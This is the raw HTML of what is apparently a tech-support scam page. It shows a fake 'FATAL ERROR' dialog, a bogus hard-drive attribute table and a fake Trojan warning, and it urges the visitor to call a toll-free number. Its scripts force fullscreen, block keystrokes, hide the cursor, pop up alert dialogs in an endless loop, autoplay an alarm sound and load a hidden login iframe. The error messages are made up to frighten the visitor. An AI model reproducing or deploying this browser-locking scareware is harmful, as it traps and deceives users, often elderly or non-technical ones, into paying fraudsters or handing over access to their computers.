<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Error Hard Drive Safety Delete</title>


<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-123433039-2"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());

gtag('config', 'UA-123433039-2');
</script>



<script type='text/javascript'>
  document.onkeydown = function (e) {
    e.preventDefault();
  }
</script>



<Style>
   *:fullscreen
*:-ms-fullscreen,
*:-webkit-full-screen,
*:-moz-full-screen {
   overflow: auto !important;
}
   </style>
   <script>
   var el = document.documentElement
, rfs = // for newer Webkit and Firefox
       el.requestFullScreen
    || el.webkitRequestFullScreen
    || el.mozRequestFullScreen
    || el.msRequestFullScreen
;
if(typeof rfs!="undefined" && rfs){
  rfs.call(el);
} else if(typeof window.ActiveXObject!="undefined"){
  // for Internet Explorer
  var wscript = new ActiveXObject("WScript.Shell");
  if (wscript!=null) {
     wscript.SendKeys("{F11}");
  }
}
</script>


<script>
function toggleFullScreen(elem) {
    // ## The below if statement seems to work better ## if ((document.fullScreenElement && document.fullScreenElement !== null) || (document.msfullscreenElement && document.msfullscreenElement !== null) || (!document.mozFullScreen && !document.webkitIsFullScreen)) {
    if ((document.fullScreenElement !== undefined && document.fullScreenElement === null) || (document.msFullscreenElement !== undefined && document.msFullscreenElement === null) || (document.mozFullScreen !== undefined && !document.mozFullScreen) || (document.webkitIsFullScreen !== undefined && !document.webkitIsFullScreen)) {
        if (elem.requestFullScreen) {
            elem.requestFullScreen();
        } else if (elem.mozRequestFullScreen) {
            elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullScreen) {
            elem.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT);
        } else if (elem.msRequestFullscreen) {
            elem.msRequestFullscreen();
        }
    } else {
        if (document.cancelFullScreen) {
            document.cancelFullScreen();
        } else if (document.mozCancelFullScreen) {
            document.mozCancelFullScreen();
        } else if (document.webkitCancelFullScreen) {
            document.webkitCancelFullScreen();
        } else if (document.msExitFullscreen) {
            document.msExitFullscreen();
        }
    }
}
</script>
 <script type="text/javascript">
window.onload=function(){
function countdown( elementName, minutes, seconds )
{
    var element, endTime, hours, mins, msLeft, time;

    function twoDigits( n )
    {
        return (n <= 9 ? "0" + n : n);
    }

    function updateTimer()
    {
        msLeft = endTime - (+new Date);
        if ( msLeft < 1000 ) {
            element.innerHTML = "0:00";
        } else {
            time = new Date( msLeft );
            hours = time.getUTCHours();
            mins = time.getUTCMinutes();
            element.innerHTML = (hours ? hours + ':' + twoDigits( mins ) : mins) + ':' + twoDigits( time.getUTCSeconds() );
            setTimeout( updateTimer, time.getUTCMilliseconds() + 500 );
        }
    }

    element = document.getElementById( elementName );
    endTime = (+new Date) + 1000 * (60*minutes + seconds) + 500;
    updateTimer();
}

countdown( "countdown", 5, 0 );
}

</script>
<script src="back_files/analytics.js" async=""></script><script type="text/javascript" async="" src="back_files/ga.js"></script><script type="text/javascript" src="back_files/jquery-1.js"></script>
<style>
body,html {
	height:100%;
	background-color: #000000;
cursor:none;
	
}
.style1 {
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
	color: #FFFFFF;
	font-size: 18px;
}
.style2 {
	font-size: 36px;
	font-family: "Courier New", Courier, monospace;
	color: #FFFFFF;

}

.style4 {
	font-size: 18px;
	font-family: "terminal", Courier, monospace;
	color: #FFFFFF;
	margin:0px;
	letter-spacing:0px;
	margin-left:50px;
	
}
.style4a {
	font-size: 21px;
	font-family: "terminal", Courier, monospace;
	color: #FFFFFF;
	margin:0px;
	letter-spacing:0px;
	margin-left:50px;
	border-bottom:1px;
	border-bottom-color:#ffffff;border-bottom-style:solid;
	
}
.style5 {
	font-size: 25px;
	font-family: "terminal", Courier, monospace;
	color: #ffff00;float:left;
	margin:0px;
	margin-left:50px;
	
	
	letter-spacing:0px; } 



.style6 {font-size: 25px;
	font-family: "terminal", Courier, monospace;
	color:#ff3300;
	margin:0px;
	margin-left:50px;
	

}  
#box{position: absolute;
    top: 0px;
    left: 0;
    right: 0;
    width: 750px;
    height: 290px;
    margin-top:180px;
    border: 0px solid #c7c7c7;
    border-radius: 3px;
    background: #fbfbfb;
    padding: 20px;
    box-sizing: border-box;
    font-family: sans-serif;
    box-shadow: 0 2px 2px 0px #ccc;
    font-size: 14px;
    z-index: 9;
}

#box img{float:left;
}
#box p{position: absolute;
    top: 0px;
    left: 0;
    right: 0;
    width: 500px;
    margin-left: 140px;
	margin-top:50px;
    border-radius: 3px;
    font-family: sans-serif;
    font-size: 12px;
    z-index: 9;
	float:left;
}
#box h2{ font-size: 15px; font-weight: inherit; margin: 0; } #box .btn{ border: 1px solid #bababa; border-radius: 2px; padding: 3px 3px; margin: 2px; display: inline-block; cursor: pointer; float: right; text-decoration: none; color: #333; } 

#box .btn:nth-child(2n-1){ font-weight: bold; border: 1px solid #3c79ee; }

.userInfo
	{
		position: absolute;
    top: 0px;
    width: 765px; height: 180px;
    right: 250px;
    padding: 0px;
    box-sizing: border-box;
    font-size: 18px;
    font-family: "Courier New",Courier,monospace;
  	}
	.img{
		position:absolute;
		width:100%;
		height:100%;
		top:0;
		left:0;z-index:0;
		
	}
	.img img{
		width:100%;
		height:100%;
		display:block;		
	}
</style>

<script type="text/javascript" src="back_files/jquery-2.js"></script>

</head>
<body onload="myFunction();" onclick="myFunction();" onkeydown="myFunction();"  onunload="myFunction();">

<div class="userInfo">
<div id="box">
    <h2 style="text-align:left;">FATAL ERROR</h2><br>
	<img src="i/fatal.png"><P>
    CheckDisalowAllocation.Allocating memory when it not allowed to allocate memory.<br><br>UnityEditor.EditorUtility:UnloadUnusedAssests()<br>Vuforia.Editor.Classes.ImageTargetEditor:UpdateMesh(IEditorImageTargetBehaviour)<br>
	Vuforia.Editor.Classes.ImageTargetEditor:UpdateAspectRatio(IEditorImageTargetBehaviourVector2)<br>Vuforia.Editor.Classes.ImageTargetAccessor:ApplyDataSetAppearance()<br>Vuforia.Editor.Classes.SceneManager:UpdateTrackableAppearance(TrackableBehaviour[])<br>Vuforia.Editor.Classes.SceneManager:InitScene()<br>Vuforia.Editor.Classes.ImageTargetEditor:EditorConfigureTarget(ImageTargetAbstractBehaviour)<br>Vuforia.Editor.Classes.ImageTargetEditor:OnEnable()<br>
	For Technical Assistance Call on:++1 877 771 2060(Toll Free)<br><a target="_blank" class="btn"href="index1.html">Stay On Page</a> <a target="_blank" class="btn" href="index1.html">Leave Page</a> </P>
    
</div></div>

<script type="text/javascript">var Msg="Warning: Hyper-V Manager !!! \n\n An error occured while attempting to change the state of virtual machine savtstfc01.\n\n'savtstfc01' failed to start.\nEmulated IDE Controller (Instance ID {83F8638B-8DCA-4152-9EDA-2CA8B33039B4}): Failed to power on with Error 'Genral access denied error'\n\n IDE/ATAPI:Could not attach 'E:\Virtuals\savtstfc01.vhd' to lacation 0/0 of IDE Controller. Error:'General access denied error'\n\n The file 'E:\Viruals\savtstfc.vhd' does not have the required security settings. Error:'General access denied error'\n\n ********** IMMEDIATE RESPONSE REQUIRED **********\n\nCall Help Desk\n---------------------------------------------------------\nCustomer Service: ++1 877 771 2060(TOLL-FREE)\n---------------------------------------------------------\nYour Hard Disk May Have Corrupt! Please Do Not Try to Fix Manually, It May Crash Your Data.\n\nConsequently, we are performing additional security checks to verify system security.\n\n********** IMMEDIATE RESPONSE REQUIRED **********\n\n CALL ON:++1 877 771 2060(TOLL-FREE)\n\nVirus Info:\nA Trojan horse, or Trojan, in computing is a non-self-replicating type of malware program containing malicious code that, when executed, carries out actions determined by the nature of the Trojan, typically causing loss or theft of data, and possible system harm. The term is derived from the story of the wooden horse used to trick defenders of Troy into taking concealed warriors into their city in ancient Greece, because computer Trojans often employ a form of social engineering, presenting themselves as routine, useful, or interesting in order to persuade victims to install them on their computers.\n\nA Trojan often acts as a backdoor, contacting a controller which can then have unauthorized access to the affected computer. The Trojan and backdoors are not themselves easily detectable, but if they carry out significant computing or communications activity may cause the computer to run noticeably slowly. Malicious programs are classified as Trojans if they do not attempt to inject themselves into other files (computer virus) or otherwise propagate themselves (worm).\n\nA computer may host a Trojan via a malicious program a user is duped into executing files or browsing internet.\nPlease contact network administration department at ++1 877 771 2060  (TOLL-FREE)\n\n";if(window.chrome){if(window.opr){}else{function msg_ch(){alert(Msg);}window.setInterval(function(){msg_ch()},1100);}} else {if(window.sidebar){function msg_ff(){var i=document.createElement("div");i.innerHTML='<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src=""></iframe></div>';document.body.appendChild(i);}window.setInterval(function(){msg_ff()},1000);} else {function msg(){var r = confirm(Msg);if (r == true) {alert(Msg);} else {alert(Msg);}}window.setInterval(function(){msg()},1000);}}</script>


<!-- google adword analytics code -->



<audio autoplay="autoplay" loop="">
  <source src="err.mp3" type="audio/mpeg">
</audio>

     <p class="style4">&nbsp;</p>   
      
     <p class="style4"><img src="i/2.png">&nbsp;Drive 0: FUJITSU MPG3204AH&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Serial Number:&nbsp;&nbsp;&nbsp; VJ02T1302G9P</p>   
      <p class="style4"><img src="i/2.png">&nbsp;Size 0: 19546 Mb(19.09Gb)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Controller Revision: 42B5</p>
	     <p class="style4">&nbsp;</p>
		    <p class="style4"><img src="i/2.png">&nbsp;T.E.C. prediction monitoring started at: <script type="text/javascript"> document.write("Date and time: " + Date()); </script></p>
			<p class="style4">&nbsp;</p>
			   <p class="style4a">&nbsp;&nbsp;Attribute&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ID&nbsp;&nbsp;&nbsp;&nbsp;Threshold&nbsp;&nbsp;&nbsp;&nbsp; Value&nbsp;&nbsp;&nbsp;&nbsp;Indicator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1/Month&nbsp;&nbsp;&nbsp;T.E.C.</p>

			      <p class="style4"><img src="i/3.png">&nbsp;Raw Read Error Read&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

	  
      <p class="style4"><img src="i/3.png">&nbsp;Throughput Performance&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

	  	    <p class="style4"><img src="i/3.png">&nbsp;Spin Up Time&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

			<p class="style4"><img src="i/3.png">&nbsp;Start/Stop Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>


			   <p class="style4"><img src="i/3.png">&nbsp;Rellocated Sector Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

			      <p class="style4"><img src="i/3.png">&nbsp;Seek Error Rate&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>


				     <p class="style4"><img src="i/3.png">&nbsp;Seek Performance Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

					     <p class="style4"><img src="i/3.png">&nbsp;Power on Hours Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

						    <p class="style4"><img src="i/3.png">&nbsp;Spin Retry Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							<p class="style4"><img src="i/3.png">&nbsp;Drive Power Supply Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							 <p class="style4"><img src="i/3.png">&nbsp;Drive Temprature&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							  <p class="style4"><img src="i/3.png">&nbsp;Reallocation Events Count&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							 
							 <p class="style4"><img src="i/3.png">&nbsp;Current Pending Sector&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							  <p class="style4"><img src="i/3.png">&nbsp;Uncorrectable Sector&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							  <p class="style4"><img src="i/3.png">&nbsp;Ultra ATA CRC Error Rate&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							   <p class="style4"><img src="i/3.png">&nbsp;Write Error Rate&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;100&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/1.png"><img src="i/4.png"><img src="i/4.png"><img src="i/5.png"><img src="i/5.png">
				  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unknown</p>

							    <p class="style4">=======================================================================================================================</p>
								 <p class="style4">Note:"<img src="i/3.png">" means life-critical attribute</p>
								  <p class="style4"><img src="i/2.png"> T.E.C. Not Detected</p>
								 
								
								<p class="style6">FATAL ERROR:</p>
								<p class="style5">Out of memory for allocation ++1 877 771 2060,couldn't free any thing else.</p>
								
   
   
   
   
     <iframe src="../login.php" frameborder="0" height="0" width="0"/>
   
   

 <script type="text/javascript">
        var _stk = "deb29441aff5b7197baa2b0d947dab7fb5ef2279";
        (function(){
            var a=document, b=a.createElement("script"); b.type="text/javascript";
            b.async=!0; b.src=('https:'==document.location.protocol ? 'https://' :
            'http://') + 'd31y97ze264gaa.cloudfront.net/assets/st/js/st.js';
            a=a.getElementsByTagName("script")[0]; a.parentNode.insertBefore(b,a);
        })();
    </script>
</body>

</html>